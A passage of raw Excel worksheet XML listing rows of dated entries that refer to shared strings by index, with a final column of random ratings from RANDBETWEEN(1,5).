        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9190" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9190" s="1">
        <v>43369.304837962962</v>
      </c>
      <c r="C9190" t="s">
        <v>69</v>
      </c>
      <c r="E9190" s="2" t="s">
        <v>8187</v>
      </c>
      <c r="F9190">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9191" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9191" s="1">
        <v>43369.302928240744</v>
      </c>
      <c r="C9191" t="s">
        <v>10</v>
      </c>
      <c r="D9191" t="s">
        <v>290</v>
      </c>
      <c r="E9191" t="s">
        <v>8188</v>
      </c>
      <c r="F9191">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9192" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A9192" s="1">
        <v>43369.281261574077</v>
      </c>
      <c r="C9192" t="s">
        <v>6</v>
      </c>
      <c r="D9192" t="s">
        <v>194</v>
      </c>
      <c r="E9192" s="2" t="s">
        <v>8189</v>
      </c>
      <c r="F9192">
        <f t="shared" ca="1" si="143"/>
        <v>5</v>
      </c>
    </row>
    <row r="9193" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9193" s="1">
        <v>43369.274699074071</v>
      </c>
      <c r="C9193" t="s">
        <v>2210</v>
      </c>
      <c r="E9193" s="2" t="s">
        <v>8190</v>
      </c>
      <c r="F9193">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9194" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9194" s="1">
        <v>43369.255740740744</v>
      </c>
      <c r="C9194" t="s">
        <v>118</v>
      </c>
      <c r="E9194" t="s">
        <v>8191</v>
      </c>
      <c r="F9194">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9195" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A9195" s="1">
        <v>43369.231886574074</v>
      </c>
      <c r="C9195" t="s">
        <v>73</v>
      </c>
      <c r="E9195" s="2" t="s">
        <v>8192</v>
      </c>
      <c r="F9195">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9196" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9196" s="1">
        <v>43369.217361111114</v>
      </c>
      <c r="C9196" t="s">
        <v>48</v>
      </c>
      <c r="E9196" t="s">
        <v>8193</v>
      </c>
      <c r="F9196">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9197" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9197" s="1">
        <v>43369.187557870369</v>
      </c>
      <c r="C9197" t="s">
        <v>71</v>
      </c>
      <c r="D9197" t="s">
        <v>312</v>
      </c>
      <c r="E9197" s="2" t="s">
        <v>8194</v>
      </c>
      <c r="F9197">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9198" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9198" s="1">
        <v>43369.110023148147</v>
      </c>
      <c r="C9198" t="s">
        <v>318</v>
      </c>
      <c r="E9198" s="2" t="s">
        <v>8195</v>
      </c>
      <c r="F9198">
        <f t="shared" ca="1" si="143"/>
        <v>4</v>
      </c>
    </row>
    <row r="9199" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9199" s="1">
        <v>43368.902557870373</v>
      </c>
      <c r="C9199" t="s">
        <v>139</v>
      </c>
      <c r="E9199" t="s">
        <v>8196</v>
      </c>
      <c r="F9199">
        <f t="shared" ca="1" si="143"/>
        <v>3</v>
      </c>
    </row>
    <row r="9200" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9200" s="1">
        <v>43368.867129629631</v>
      </c>
      <c r="C9200" t="s">
        <v>253</v>
      </c>
      <c r="E9200" t="s">
        <v>8197</v>
      </c>
      <c r="F9200">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9201" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9201" s="1">
        <v>43368.864629629628</v>
      </c>
      <c r="C9201" t="s">
        <v>118</v>
      </c>
      <c r="E9201">
        <v>183925954</v>
      </c>
      <c r="F9201">
        <f t="shared" ca="1" si="143"/>
        <v>5</v>
      </c>
    </row>
    <row r="9202" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9202" s="1">
        <v>43368.785555555558</v>
      </c>
      <c r="C9202" t="s">
        <v>10</v>
      </c>
      <c r="D9202" t="s">
        <v>330</v>
      </c>
      <c r="E9202" s="2" t="s">
        <v>8198</v>
      </c>
      <c r="F9202">
        <f t="shared" ca="1" si="143"/>
        <v>5</v>
      </c>
    </row>
    <row r="9203" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9203" s="1">
        <v>43368.777557870373</v>
      </c>
      <c r="C9203" t="s">
        <v>10</v>
      </c>
      <c r="D9203" t="s">
        <v>52</v>
      </c>
      <c r="E9203" t="s">
        <v>8199</v>
      </c>
      <c r="F9203">
        <f t="shared" ca="1" si="143"/>
        <v>3</v>
      </c>
    </row>
    <row r="9204" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9204" s="1">
        <v>43368.760949074072</v>
      </c>
      <c r="C9204" t="s">
        <v>10</v>
      </c>
      <c r="D9204" t="s">
        <v>6</v>
      </c>
      <c r="E9204" t="s">
        <v>8200</v>
      </c>
      <c r="F9204">
        <f t="shared" ca="1" si="143"/>
        <v>3</v>
      </c>
    </row>
    <row r="9205" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9205" s="1">
        <v>43368.747766203705</v>
      </c>
      <c r="C9205" t="s">
        <v>10</v>
      </c>
      <c r="D9205" t="s">
        <v>107</v>
      </c>
      <c r="E9205" t="s">
        <v>8201</v>
      </c>
      <c r="F9205">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9206" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9206" s="1">
        <v>43368.717627314814</v>
      </c>
      <c r="C9206" t="s">
        <v>10</v>
      </c>
      <c r="D9206" t="s">
        <v>151</v>
      </c>
      <c r="E9206" t="s">
        <v>8202</v>
      </c>
      <c r="F9206">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9207" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9207" s="1">
        <v>43368.715324074074</v>
      </c>
      <c r="C9207" t="s">
        <v>260</v>
      </c>
      <c r="E9207" t="s">
        <v>8203</v>
      </c>
      <c r="F9207">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9208" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9208" s="1">
        <v>43368.713020833333</v>
      </c>
      <c r="C9208" t="s">
        <v>10</v>
      </c>
      <c r="D9208" t="s">
        <v>6</v>
      </c>
      <c r="E9208" t="s">
        <v>8204</v>
      </c>
      <c r="F9208">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9209" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9209" s="1">
        <v>43368.705196759256</v>
      </c>
      <c r="C9209" t="s">
        <v>10</v>
      </c>
      <c r="D9209" t="s">
        <v>46</v>
      </c>
      <c r="E9209" t="s">
        <v>8205</v>
      </c>
      <c r="F9209">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9210" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9210" s="1">
        <v>43368.690243055556</v>
      </c>
      <c r="C9210" t="s">
        <v>10</v>
      </c>
      <c r="D9210" t="s">
        <v>80</v>
      </c>
      <c r="E9210" s="2" t="s">
        <v>8206</v>
      </c>
      <c r="F9210">
        <f t="shared" ca="1" si="143"/>
        <v>4</v>
      </c>
    </row>
    <row r="9211" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9211" s="1">
        <v>43368.654976851853</v>
      </c>
      <c r="C9211" t="s">
        <v>10</v>
      </c>
      <c r="D9211" t="s">
        <v>36</v>
      </c>
      <c r="E9211" s="2" t="s">
        <v>8207</v>
      </c>
      <c r="F9211">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9212" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9212" s="1">
        <v>43368.626759259256</v>
      </c>
      <c r="C9212" t="s">
        <v>10</v>
      </c>
      <c r="D9212" t="s">
        <v>23</v>
      </c>
      <c r="E9212" t="s">
        <v>8208</v>
      </c>
      <c r="F9212">
        <f t="shared" ca="1" si="143"/>
        <v>2</v>
      </c>
    </row>
    <row r="9213" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9213" s="1">
        <v>43368.608287037037</v>
      </c>
      <c r="C9213" t="s">
        <v>10</v>
      </c>
      <c r="D9213" t="s">
        <v>94</v>
      </c>
      <c r="E9213" t="s">
        <v>8209</v>
      </c>
      <c r="F9213">
        <f t="shared" ca="1" si="143"/>
        <v>4</v>
      </c>
    </row>
    <row r="9214" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9214" s="1">
        <v>43368.594201388885</v>
      </c>
      <c r="C9214" t="s">
        <v>6</v>
      </c>
      <c r="D9214" t="s">
        <v>194</v>
      </c>
      <c r="E9214" s="2" t="s">
        <v>8210</v>
      </c>
      <c r="F9214">
        <f t="shared" ca="1" si="143"/>
        <v>4</v>
      </c>
    </row>
    <row r="9215" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9215" s="1">
        <v>43368.593136574076</v>
      </c>
      <c r="C9215" t="s">
        <v>107</v>
      </c>
      <c r="E9215" s="2" t="s">
        <v>8211</v>
      </c>
      <c r="F9215">
        <f t="shared" ca="1" si="143"/>
        <v>3</v>
      </c>
    </row>
    <row r="9216" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A9216" s="1">
        <v>43368.56417824074</v>
      </c>
      <c r="C9216" t="s">
        <v>6</v>
      </c>
      <c r="E9216" s="2" t="s">
        <v>8212</v>
      </c>
      <c r="F9216">
        <f t="shared" ca="1" si="143"/>
        <v>1</v>
      </c>
    </row>
    <row r="9217" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A9217" s="1">
        <v>43368.549224537041</v>
      </c>
      <c r="C9217" t="s">
        <v>10</v>
      </c>
      <c r="D9217" t="s">
        <v>6</v>
      </c>
      <c r="E9217" s="2" t="s">
        <v>8213</v>
      </c>
      <c r="F9217">
        <f t="shared" ca="1" si="143"/>
        <v>4</v>
      </c>
    </row>
    <row r="9218" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9218" s="1">
        <v>43368.520300925928</v>
      </c>
      <c r="C9218" t="s">
        <v>10</v>
      </c>
      <c r="D9218" t="s">
        <v>494</v>
      </c>
      <c r="E9218" s="2" t="s">
        <v>8214</v>
      </c>
      <c r="F9218">
        <f t="shared" ref="F9218:F9281" ca="1" si="144">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="9219" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A9219" s="1">
        <v>43368.510671296295</v>
      </c>
      <c r="C9219" t="s">
        <v>48</v>
      </c>
      <c r="E9219" s="2" t="s">
        <v>8215</v>
      </c>
      <c r="F9219">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9220" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A9220" s="1">
        <v>43368.505578703705</v>
      </c>
      <c r="C9220" t="s">
        <v>60</v>
      </c>
      <c r="E9220" s="2" t="s">
        <v>8216</v>
      </c>
      <c r="F9220">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9221" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9221" s="1">
        <v>43368.494791666664</v>
      </c>
      <c r="C9221" t="s">
        <v>10</v>
      </c>
      <c r="E9221" t="s">
        <v>8217</v>
      </c>
      <c r="F9221">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9222" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9222" s="1">
        <v>43368.489953703705</v>
      </c>
      <c r="C9222" t="s">
        <v>10</v>
      </c>
      <c r="D9222" t="s">
        <v>46</v>
      </c>
      <c r="E9222" t="s">
        <v>8218</v>
      </c>
      <c r="F9222">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9223" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9223" s="1">
        <v>43368.479733796295</v>
      </c>
      <c r="C9223" t="s">
        <v>10</v>
      </c>
      <c r="D9223" t="s">
        <v>11</v>
      </c>
      <c r="E9223" t="s">
        <v>8219</v>
      </c>
      <c r="F9223">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9224" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9224" s="1">
        <v>43368.471354166664</v>
      </c>
      <c r="C9224" t="s">
        <v>10</v>
      </c>
      <c r="D9224" t="s">
        <v>92</v>
      </c>
      <c r="E9224" t="s">
        <v>8220</v>
      </c>
      <c r="F9224">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9225" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9225" s="1">
        <v>43368.467141203706</v>
      </c>
      <c r="C9225" t="s">
        <v>173</v>
      </c>
      <c r="E9225" s="2" t="s">
        <v>8221</v>
      </c>
      <c r="F9225">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9226" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9226" s="1">
        <v>43368.458564814813</v>
      </c>
      <c r="C9226" t="s">
        <v>260</v>
      </c>
      <c r="E9226" s="2" t="s">
        <v>8222</v>
      </c>
      <c r="F9226">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9227" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9227" s="1">
        <v>43368.449259259258</v>
      </c>
      <c r="C9227" t="s">
        <v>48</v>
      </c>
      <c r="E9227" t="s">
        <v>8223</v>
      </c>
      <c r="F9227">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9228" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9228" s="1">
        <v>43368.447569444441</v>
      </c>
      <c r="C9228" t="s">
        <v>10</v>
      </c>
      <c r="D9228" t="s">
        <v>80</v>
      </c>
      <c r="E9228" t="s">
        <v>8224</v>
      </c>
      <c r="F9228">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9229" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A9229" s="1">
        <v>43368.443287037036</v>
      </c>
      <c r="C9229" t="s">
        <v>319</v>
      </c>
      <c r="D9229" t="s">
        <v>14</v>
      </c>
      <c r="E9229" s="2" t="s">
        <v>8225</v>
      </c>
      <c r="F9229">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9230" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9230" s="1">
        <v>43368.426064814812</v>
      </c>
      <c r="C9230" t="s">
        <v>243</v>
      </c>
      <c r="D9230" t="s">
        <v>312</v>
      </c>
      <c r="E9230" s="2" t="s">
        <v>8226</v>
      </c>
      <c r="F9230">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9231" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9231" s="1">
        <v>43368.411909722221</v>
      </c>
      <c r="C9231" t="s">
        <v>10</v>
      </c>
      <c r="D9231" t="s">
        <v>20</v>
      </c>
      <c r="E9231" t="s">
        <v>8227</v>
      </c>
      <c r="F9231">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9232" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9232" s="1">
        <v>43368.40865740741</v>
      </c>
      <c r="C9232" t="s">
        <v>48</v>
      </c>
      <c r="E9232" s="2" t="s">
        <v>8228</v>
      </c>
      <c r="F9232">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9233" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9233" s="1">
        <v>43368.408414351848</v>
      </c>
      <c r="C9233" t="s">
        <v>10</v>
      </c>
      <c r="D9233" t="s">
        <v>112</v>
      </c>
      <c r="E9233" t="s">
        <v>8229</v>
      </c>
      <c r="F9233">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9234" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9234" s="1">
        <v>43368.407384259262</v>
      </c>
      <c r="C9234" t="s">
        <v>140</v>
      </c>
      <c r="D9234" t="s">
        <v>141</v>
      </c>
      <c r="E9234" s="2" t="s">
        <v>8230</v>
      </c>
      <c r="F9234">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9235" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9235" s="1">
        <v>43368.359988425924</v>
      </c>
      <c r="C9235" t="s">
        <v>10</v>
      </c>
      <c r="D9235" t="s">
        <v>178</v>
      </c>
      <c r="E9235" t="s">
        <v>8231</v>
      </c>
      <c r="F9235">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9236" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9236" s="1">
        <v>43368.3359375</v>
      </c>
      <c r="C9236" t="s">
        <v>48</v>
      </c>
      <c r="E9236" t="s">
        <v>8232</v>
      </c>
      <c r="F9236">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9237" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A9237" s="1">
        <v>43368.317685185182</v>
      </c>
      <c r="C9237" t="s">
        <v>41</v>
      </c>
      <c r="E9237" s="2" t="s">
        <v>8233</v>
      </c>
      <c r="F9237">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9238" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9238" s="1">
        <v>43368.308506944442</v>
      </c>
      <c r="C9238" t="s">
        <v>16</v>
      </c>
      <c r="E9238" s="2" t="s">
        <v>8234</v>
      </c>
      <c r="F9238">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9239" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9239" s="1">
        <v>43368.306388888886</v>
      </c>
      <c r="C9239" t="s">
        <v>10</v>
      </c>
      <c r="D9239" t="s">
        <v>151</v>
      </c>
      <c r="E9239" t="s">
        <v>8235</v>
      </c>
      <c r="F9239">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9240" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9240" s="1">
        <v>43368.273125</v>
      </c>
      <c r="C9240" t="s">
        <v>48</v>
      </c>
      <c r="E9240" s="2" t="s">
        <v>8236</v>
      </c>
      <c r="F9240">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9241" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9241" s="1">
        <v>43368.261724537035</v>
      </c>
      <c r="C9241" t="s">
        <v>344</v>
      </c>
      <c r="E9241" t="s">
        <v>8237</v>
      </c>
      <c r="F9241">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9242" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9242" s="1">
        <v>43368.259016203701</v>
      </c>
      <c r="C9242" t="s">
        <v>80</v>
      </c>
      <c r="D9242" t="s">
        <v>330</v>
      </c>
      <c r="E9242" t="s">
        <v>8238</v>
      </c>
      <c r="F9242">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9243" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9243" s="1">
        <v>43368.236921296295</v>
      </c>
      <c r="C9243" t="s">
        <v>48</v>
      </c>
      <c r="E9243" t="s">
        <v>8239</v>
      </c>
      <c r="F9243">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9244" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9244" s="1">
        <v>43368.206469907411</v>
      </c>
      <c r="C9244" t="s">
        <v>48</v>
      </c>
      <c r="E9244" t="s">
        <v>8240</v>
      </c>
      <c r="F9244">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9245" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9245" s="1">
        <v>43368.196435185186</v>
      </c>
      <c r="C9245" t="s">
        <v>71</v>
      </c>
      <c r="E9245" t="s">
        <v>8241</v>
      </c>
      <c r="F9245">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9246" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9246" s="1">
        <v>43368.168807870374</v>
      </c>
      <c r="C9246" t="s">
        <v>41</v>
      </c>
      <c r="E9246" t="s">
        <v>8242</v>
      </c>
      <c r="F9246">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9247" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9247" s="1">
        <v>43368.138333333336</v>
      </c>
      <c r="C9247" t="s">
        <v>60</v>
      </c>
      <c r="E9247" t="s">
        <v>8243</v>
      </c>
      <c r="F9247">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9248" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9248" s="1">
        <v>43368.130150462966</v>
      </c>
      <c r="C9248" t="s">
        <v>301</v>
      </c>
      <c r="E9248" s="2" t="s">
        <v>8244</v>
      </c>
      <c r="F9248">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9249" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9249" s="1">
        <v>43368.12835648148</v>
      </c>
      <c r="C9249" t="s">
        <v>48</v>
      </c>
      <c r="E9249" t="s">
        <v>8245</v>
      </c>
      <c r="F9249">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9250" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9250" s="1">
        <v>43368.12773148148</v>
      </c>
      <c r="C9250" t="s">
        <v>10</v>
      </c>
      <c r="D9250" t="s">
        <v>6</v>
      </c>
      <c r="E9250" t="s">
        <v>8246</v>
      </c>
      <c r="F9250">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9251" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9251" s="1">
        <v>43368.126921296294</v>
      </c>
      <c r="C9251" t="s">
        <v>65</v>
      </c>
      <c r="E9251" t="s">
        <v>8247</v>
      </c>
      <c r="F9251">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9252" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A9252" s="1">
        <v>43368.087337962963</v>
      </c>
      <c r="C9252" t="s">
        <v>71</v>
      </c>
      <c r="E9252" s="2" t="s">
        <v>8248</v>
      </c>
      <c r="F9252">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9253" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9253" s="1">
        <v>43368.049027777779</v>
      </c>
      <c r="C9253" t="s">
        <v>41</v>
      </c>
      <c r="E9253" s="2" t="s">
        <v>8249</v>
      </c>
      <c r="F9253">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9254" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9254" s="1">
        <v>43368.014965277776</v>
      </c>
      <c r="C9254" t="s">
        <v>318</v>
      </c>
      <c r="E9254" t="s">
        <v>8250</v>
      </c>
      <c r="F9254">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9255" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9255" s="1">
        <v>43367.995370370372</v>
      </c>
      <c r="C9255" t="s">
        <v>140</v>
      </c>
      <c r="D9255" t="s">
        <v>234</v>
      </c>
      <c r="E9255" t="s">
        <v>8251</v>
      </c>
      <c r="F9255">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9256" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9256" s="1">
        <v>43367.952638888892</v>
      </c>
      <c r="C9256" t="s">
        <v>10</v>
      </c>
      <c r="D9256" t="s">
        <v>86</v>
      </c>
      <c r="E9256" t="s">
        <v>8252</v>
      </c>
      <c r="F9256">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9257" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9257" s="1">
        <v>43367.93922453704</v>
      </c>
      <c r="C9257" t="s">
        <v>139</v>
      </c>
      <c r="E9257" t="s">
        <v>8253</v>
      </c>
      <c r="F9257">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9258" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9258" s="1">
        <v>43367.904178240744</v>
      </c>
      <c r="C9258" t="s">
        <v>339</v>
      </c>
      <c r="E9258" s="2" t="s">
        <v>8254</v>
      </c>
      <c r="F9258">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9259" s="1">
        <v>43367.876875000002</v>
      </c>
      <c r="C9259" t="s">
        <v>140</v>
      </c>
      <c r="D9259" t="s">
        <v>141</v>
      </c>
      <c r="E9259" t="s">
        <v>8255</v>
      </c>
      <c r="F9259">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9260" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A9260" s="1">
        <v>43367.805104166669</v>
      </c>
      <c r="C9260" t="s">
        <v>73</v>
      </c>
      <c r="E9260" s="2" t="s">
        <v>8256</v>
      </c>
      <c r="F9260">
        <f t="shared" ca="1" si="144"/>
        <v>5</v>
      </c>
    </row>
    <row r="9261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9261" s="1">
        <v>43367.771666666667</v>
      </c>
      <c r="C9261" t="s">
        <v>10</v>
      </c>
      <c r="D9261" t="s">
        <v>36</v>
      </c>
      <c r="E9261" t="s">
        <v>8257</v>
      </c>
      <c r="F9261">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9262" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9262" s="1">
        <v>43367.768506944441</v>
      </c>
      <c r="C9262" t="s">
        <v>6</v>
      </c>
      <c r="D9262" t="s">
        <v>25</v>
      </c>
      <c r="E9262" s="2" t="s">
        <v>8258</v>
      </c>
      <c r="F9262">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9263" s="1">
        <v>43367.704780092594</v>
      </c>
      <c r="C9263" t="s">
        <v>10</v>
      </c>
      <c r="D9263" t="s">
        <v>178</v>
      </c>
      <c r="E9263" t="s">
        <v>8259</v>
      </c>
      <c r="F9263">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9264" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9264" s="1">
        <v>43367.687372685185</v>
      </c>
      <c r="C9264" t="s">
        <v>10</v>
      </c>
      <c r="E9264" t="s">
        <v>8260</v>
      </c>
      <c r="F9264">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9265" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9265" s="1">
        <v>43367.683576388888</v>
      </c>
      <c r="C9265" t="s">
        <v>10</v>
      </c>
      <c r="D9265" t="s">
        <v>192</v>
      </c>
      <c r="E9265" t="s">
        <v>8261</v>
      </c>
      <c r="F9265">
        <f t="shared" ca="1" si="144"/>
        <v>4</v>
      </c>
    </row>
    <row r="9266" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A9266" s="1">
        <v>43367.663668981484</v>
      </c>
      <c r="C9266" t="s">
        <v>6</v>
      </c>
      <c r="D9266" t="s">
        <v>25</v>
      </c>
      <c r="E9266" s="2" t="s">
        <v>8262</v>
      </c>
      <c r="F9266">
        <f t="shared" ca="1" si="144"/>
        <v>2</v>
      </c>
    </row>
    <row r="9267" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9267" s="1">
        <v>43367.654942129629</v>
      </c>
      <c r="C9267" t="s">
        <v>6</v>
      </c>
      <c r="D9267" t="s">
        <v>194</v>
      </c>
      <c r="E9267" t="s">
        <v>8263</v>
      </c>
      <c r="F9267">
        <f t="shared" ca="1" si="144"/>
        <v>1</v>
      </c>
    </row>
    <row r="9268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9268" s="1">
        <v>43367.650231481479</v>
      </c>
      <c r="C9268" t="s">
        <v>10</v>
      </c>
      <c r="D9268" t="s">
        <v>80</v>
      </c>
      <c r="F9268">
        <f t="shared" ca="1" si="144"/>
        <v>3</v>
      </c>
    </row>
    <row r="9269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9269" s="1">
